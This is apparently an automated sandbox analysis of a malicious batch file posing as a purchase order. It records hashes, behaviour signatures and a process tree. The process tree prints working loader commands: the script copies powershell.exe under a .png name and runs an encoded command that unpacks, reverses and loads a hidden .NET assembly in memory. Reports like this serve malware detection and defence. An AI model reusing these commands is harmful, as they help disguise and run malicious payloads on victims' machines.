Analysis
-
max time kernel
122s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11-10-2023 11:27
Static task
static1
Behavioral task
behavioral1
Sample
New Purchase Order MRT10123E-05794011.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
New Purchase Order MRT10123E-05794011.bat
Resource
win10v2004-20230915-en
General
-
Target
New Purchase Order MRT10123E-05794011.bat
-
Size
1014KB
-
MD5
6e3fb71214123b19f8fd692c615c1577
-
SHA1
c30d85fc8d702705bcf5e6e7d9dc499733eaa03e
-
SHA256
aab4fc1afb94b7a35cad44aa926be0b28eeb52efc4746a49632f9f4427d96416
-
SHA512
35ea575c14094d2702ee908a24d974302708563dd787ee5ab9dfa61198bd6427eb8dadcca27e7027ca568f079df046b7d1f75c63500eac69f994431ea43a0830
-
SSDEEP
24576:DsCatJd8cOo5xYunVTxt3T7B4FvxjenbLz2D8qw:F4VHH0ebXL
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1700 Qicoiyo.png -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1700 Qicoiyo.png -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1700 Qicoiyo.png -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1700 Qicoiyo.png -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2088 wrote to memory of 2332 2088 cmd.exe 29 PID 2088 wrote to memory of 2332 2088 cmd.exe 29 PID 2088 wrote to memory of 2332 2088 cmd.exe 29 PID 2088 wrote to memory of 2272 2088 cmd.exe 31 PID 2088 wrote to memory of 2272 2088 cmd.exe 31 PID 2088 wrote to memory of 2272 2088 cmd.exe 31 PID 2088 wrote to memory of 2772 2088 cmd.exe 32 PID 2088 wrote to memory of 2772 2088 cmd.exe 32 PID 2088 wrote to memory of 2772 2088 cmd.exe 32 PID 2772 wrote to memory of 1944 2772 cmd.exe 34 PID 2772 wrote to memory of 1944 2772 cmd.exe 34 PID 2772 wrote to memory of 1944 2772 cmd.exe 34 PID 2772 wrote to memory of 1924 2772 cmd.exe 35 PID 2772 wrote to memory of 1924 2772 cmd.exe 35 PID 2772 wrote to memory of 1924 2772 cmd.exe 35 PID 2772 wrote to memory of 1680 2772 cmd.exe 36 PID 2772 wrote to memory of 1680 2772 cmd.exe 36 PID 2772 wrote to memory of 1680 2772 cmd.exe 36 PID 2772 wrote to memory of 1112 2772 cmd.exe 37 PID 2772 wrote to memory of 1112 2772 cmd.exe 37 PID 2772 wrote to memory of 1112 2772 cmd.exe 37 PID 2772 wrote to memory of 1700 2772 cmd.exe 39 PID 2772 wrote to memory of 1700 2772 cmd.exe 39 PID 2772 wrote to memory of 1700 2772 cmd.exe 39 PID 2772 wrote to memory of 1700 2772 cmd.exe 39
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\New Purchase Order MRT10123E-05794011.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2332
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qicoiyo.png2⤵PID:2272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\New Purchase Order MRT10123E-05794011.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1944
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qicoiyo.png3⤵PID:1924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1680
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\New Purchase Order MRT10123E-05794011.bat" C:\Users\Admin\AppData\Local\Temp\Qicoiyo.png.bat3⤵PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\Qicoiyo.pngC:\Users\Admin\AppData\Local\Temp\Qicoiyo.png -win 1 -enc JABQAGIAdAB5AGYAbwBlAGwAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQATgBrAHMAbgByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAYgB0AHkAZgBvAGUAbAApADsAJABBAGQAYgBiAG0AcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQATgBrAHMAbgByACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAEYAegBkAGIAZgBqAHIAbABjAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQQBkAGIAYgBtAHIALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEYAegBkAGIAZgBqAHIAbABjAGMALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEYAegBkAGIAZgBqAHIAbABjAGMALgBDAGwAbwBzAGUAKAApADsAJABBAGQAYgBiAG0AcgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE4AawBzAG4AcgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABOAGsAcwBuAHIAKQA7ACAAJABRAGkAdgByAHgAZQB3AG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQATgBrAHMAbgByACkAOwAgACQATQB4AHAAdgB5AGUAIAA9ACAAJABRAGkAdgByAHgAZQB3AG8ALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABZAGgAbQBlAHQAbwBnACAAPQAgACQATQB4AHAAdgB5AGUALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f